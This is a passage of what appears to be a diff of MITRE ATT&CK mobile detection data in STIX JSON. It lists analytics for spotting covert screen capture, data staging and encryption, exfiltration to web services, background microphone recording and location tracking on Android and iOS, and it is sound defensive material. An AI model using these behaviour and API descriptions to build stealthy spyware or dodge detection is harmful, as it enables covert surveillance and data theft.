+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Capturing app remained backgrounded or foreground-service-only while screen capture session occurred and another app was foregrounded during capture interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before screen capture session start and no expected foreground transition or consent-linked interaction occurred during capture interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Sensitive app category remained foregrounded during screen capture session from different app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing screen capture had unapproved accessibility posture, capture-related special access, unmanaged state, or was not approved for screen recording or assistive observation workflows"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking capture-path invocation, foreground-app context, artifact creation, and optional upload."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved screen-recording, accessibility, remote-support, or QA/testing apps vary by organization and device group."
+                        },
+                        {
+                            "field": "AllowedAccessibilityApps",
+                            "description": "Approved accessibility-enabled apps vary by assistive and enterprise workflow."
+                        },
+                        {
+                            "field": "AllowedForegroundServiceCaptureApps",
+                            "description": "Some approved apps may legitimately use foreground services during screen recording."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close capture initiation must be to user interaction to be considered expected."
+                        },
+                        {
+                            "field": "SensitiveForegroundAppCategories",
+                            "description": "Categories such as banking, identity, messaging, or enterprise apps may warrant higher sensitivity during capture."
+                        },
+                        {
+                            "field": "ArtifactWriteThreshold",
+                            "description": "Minimum screenshot/video/cache write volume indicating probable screen-capture output."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for suspicious outbound transfer after capture."
+                        },
+                        {
+                            "field": "ConsentInteractionGracePeriod",
+                            "description": "Grace period allowed for expected user consent or explicit initiation before capture is treated as suspicious."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-03-24 17:47:35.979000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--bfa12b75-13ab-409f-8fe9-a93c8bcac466",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0670#AN1767",
+                            "external_id": "AN1767"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1767",
+                    "description": "The defender correlates recent access to locally collected or protected data with subsequent compression, packaging, or encryption behavior inside the same app context, followed by creation of archive-like or high-entropy output and optional near-term network transmission. The analytic prioritizes Android runtime and storage effects: application data access or sensor-derived collection, compression/encryption framework use, archive/blob creation in app-accessible storage, and background or device-locked execution inconsistent with the app\u2019s declared function.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed application with no declared backup, sync, export, or media-editing role performs bulk local packaging or encrypted archive generation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between data access, package creation, encryption, and optional network upload"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to package local data such as backup, cloud sync, file manager, or media editing apps"
+                        },
+                        {
+                            "field": "AllowedPathList",
+                            "description": "Expected storage paths for legitimate archives, exports, or caches"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether packaging/export behavior should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "BurstReadThreshold",
+                            "description": "Number of files or records read in a short interval before archive creation"
+                        },
+                        {
+                            "field": "ArchiveSizeThreshold",
+                            "description": "Minimum output size for suspicious packaged blob or archive"
+                        },
+                        {
+                            "field": "EntropyThreshold",
+                            "description": "Threshold for identifying encrypted or heavily compressed output"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum upload size consistent with recent archive creation"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-08 16:39:38.897000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--1e72355d-3350-4b60-8c92-2ded50a3fdd1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0670#AN1768",
+                            "external_id": "AN1768"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1768",
+                    "description": "The defender correlates managed-app data access and lifecycle context with indirect evidence of packaging or encryption prior to outbound transfer. Because direct archive/compression visibility is generally weaker on iOS, the analytic anchors on app lifecycle state, file/output effects observable by mobile EDR where available, managed app role via MDM, and downstream network uploads that closely follow creation of new large or high-entropy local artifacts. Confidence is lower when only network effects are available.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app without expected export, backup, or sync role performs local data staging behavior followed by opaque upload activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app enters background-capable execution or resumes processing immediately before archive-like file creation or upload behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between lifecycle event, local package creation, and upload"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps expected to archive, export, or synchronize data"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved cloud, enterprise, or sync endpoints for legitimate exports"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether packaging or export should occur only during active user interaction"
+                        },
+                        {
+                            "field": "ArchiveSizeThreshold",
+                            "description": "Minimum size for suspicious local package or blob"
+                        },
+                        {
+                            "field": "EntropyThreshold",
+                            "description": "Threshold for identifying encrypted or compressed staged output"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume consistent with recently created archive"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-08 18:29:03.808000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--ab85ff40-2b75-477a-b5ec-f35f2fcde728",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0672#AN1770",
+                            "external_id": "AN1770"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1770",
+                    "description": "The defender correlates outbound communication from an application or service to legitimate external web platforms with mobile runtime context showing that the communication is inconsistent with the app's approved role, expected destinations, user interaction pattern, or device state. The strongest Android evidence is a managed or installed app communicating with cloud storage, social, messaging, code-hosting, or generic HTTPS web-service infrastructure shortly after background activation, protected-resource use, or local staging activity, especially when the device is locked, user interaction is absent, or the app's historical network baseline does not include that service class.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App communicating with external web service is backgrounded, persistent, recently awakened, or active while device is locked or without recent user interaction in a way inconsistent with expected app behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App communicating with legitimate web-service infrastructure is unmanaged, newly installed, recently updated, outside approved app list, or shows baseline drift in role, installer source, or expected capability profile"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking app state, resource use, staging activity, and web-service communication."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved app identities and expected business roles vary by fleet and device group."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Some organizations legitimately use cloud storage, messaging, or collaboration services from mobile apps."
+                        },
+                        {
+                            "field": "AllowedDestinations",
+                            "description": "Expected domains, SNI values, CDNs, API endpoints, and redirectors vary by application and tenant."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Certain apps may legitimately communicate only in foreground, while others support background sync."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close traffic must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Recurring connection periodicity thresholds vary with push, sync, and collaboration workloads."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Data volume threshold for suspicious transfer to legitimate web-service infrastructure."
+                        },
+                        {
+                            "field": "ExpectedBackgroundBehavior",
+                            "description": "Normal background communication differs across app categories such as mail, chat, navigation, and security tools."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-17 19:52:38.107000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a0bb0e33-c40f-46f5-b64a-07faa6946d83",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0672#AN1771",
+                            "external_id": "AN1771"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1771",
+                    "description": "The defender correlates communication to legitimate external web-service platforms with supervised managed-app context and device-state information showing that the traffic is inconsistent with the app's expected role, background-refresh profile, or user interaction timing. On iOS, the strongest reliable evidence is network telemetry tied to a managed app or device plus app state and supervision context, especially when traffic to social, collaboration, cloud-storage, or generic HTTPS platforms occurs shortly after background activity, while the device is locked, or without expected user-driven foreground execution. Direct low-level framework visibility is weaker than Android, so primary analytic confidence should be anchored to supervised app context plus network behavior rather than assumed host-level proof.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app shows background activity, refresh, or lock-state-adjacent execution temporally aligned to web-service communication without expected foreground use or recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed app communicating with legitimate web-service infrastructure is newly installed, recently updated, outside expected managed-app set, or displays baseline drift in app role, release path, or business justification"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between app state changes and communication with legitimate web-service infrastructure."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Strongest app context and managed state analytics depend on supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedManagedApps",
+                            "description": "Approved managed apps and expected business use vary by organization and device profile."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Some managed apps legitimately communicate with collaboration, cloud-storage, or messaging services."
+                        },
+                        {
+                            "field": "AllowedDestinations",
+                            "description": "Expected Apple, enterprise, SaaS, CDN, and API destinations vary by app and tenant."
+                        },
+                        {
+                            "field": "BackgroundRefreshBaseline",
+                            "description": "Normal background network behavior differs across mail, chat, navigation, and enterprise apps."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close traffic must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed periodicity for sync, push, and refresh traffic varies across app categories."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for suspicious transfer volume to legitimate web-service platforms."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-17 20:24:52.509000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--d942e493-32eb-4302-890b-7729f63b7202",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0673#AN1772",
+                            "external_id": "AN1772"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1772",
+                    "description": "A defender observes an application holding microphone capture capability transitioning into active microphone resource usage through Android audio APIs (e.g., MediaRecorder or AudioRecord), followed by sustained capture while the application is backgrounded or the device is locked, and subsequent outbound network traffic suggesting potential audio exfiltration or streaming.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Microphone sensor activation or audio recording session initiated by application process"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions to background or executes while screen locked during microphone session"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining RECORD_AUDIO permission or privileged CAPTURE_AUDIO_OUTPUT capability"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "RecordingDurationThreshold",
+                            "description": "Minimum microphone session duration before triggering detection to reduce noise from short legitimate captures."
+                        },
+                        {
+                            "field": "BackgroundCapturePolicy",
+                            "description": "Environment-specific baseline for legitimate background microphone usage"
+                        },
+                        {
+                            "field": "CaptureToNetworkTimeWindow",
+                            "description": "Time window correlating microphone activation with outbound network traffic."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-04 23:26:47.489000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4623e949-e902-4a8c-893b-73e5ab4b57d5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0673#AN1773",
+                            "external_id": "AN1773"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1773",
+                    "description": "A defender observes an application with declared microphone capability initiating microphone resource use through iOS audio frameworks, potentially during background execution or shortly after a silent wake event, followed by sustained audio capture and outbound encrypted traffic suggesting audio streaming or upload activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Microphone sensor activation or audio recording session initiated by application process"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions to background or executes while screen locked during microphone session"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Application installed with NSMicrophoneUsageDescription entitlement indicating microphone capability"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ExpectedAudioAppsBaseline",
+                            "description": "Allow-list of legitimate applications expected to record audio on the device."
+                        },
+                        {
+                            "field": "BackgroundWakeCorrelationWindow",
+                            "description": "Time window correlating background wake events with microphone activation."
+                        },
+                        {
+                            "field": "MicSessionDurationThreshold",
+                            "description": "Minimum microphone recording duration considered suspicious."
+                        },
+                        {
+                            "field": "MicToNetworkCorrelationWindow",
+                            "description": "Time window linking microphone activation to outbound network activity."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for outbound traffic volume indicating possible audio upload."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-03-04 23:33:56.647000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--38e2eb61-e650-4cdc-8f27-213b39499d34",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0674#AN1774",
+                            "external_id": "AN1774"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1774",
+                    "description": "OLD: \nApplication vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. \nOn both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. \n\nNEW:\nA defender observes an Android application requesting for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR`, which may also be listed in the application\u2019s Manifest.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Invocation of Calendar.set() and Calendar.add()"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog ",
+                            "channel": "Application granted or retaining the READ_CALENDAR or WRITE_CALENDAR permissions. "
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-03-23 17:29:42.280000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--83b759ca-097c-4d9f-926b-fb41e0740644",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0675#AN1776",
+                            "external_id": "AN1776"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1776",
+                    "description": "Defender correlates an application gaining/retaining fine or background location capability with subsequent location sensor sessions that occur while the app is backgrounded or the device is locked, followed by repeated location reads at a periodic cadence and near-term outbound connections to domains not typical for fleet navigation/MDM services, indicating covert location tracking.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "EDR:telemetry",
+                            "channel": "Sustained or high-frequency location sensor access, including background location usage"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
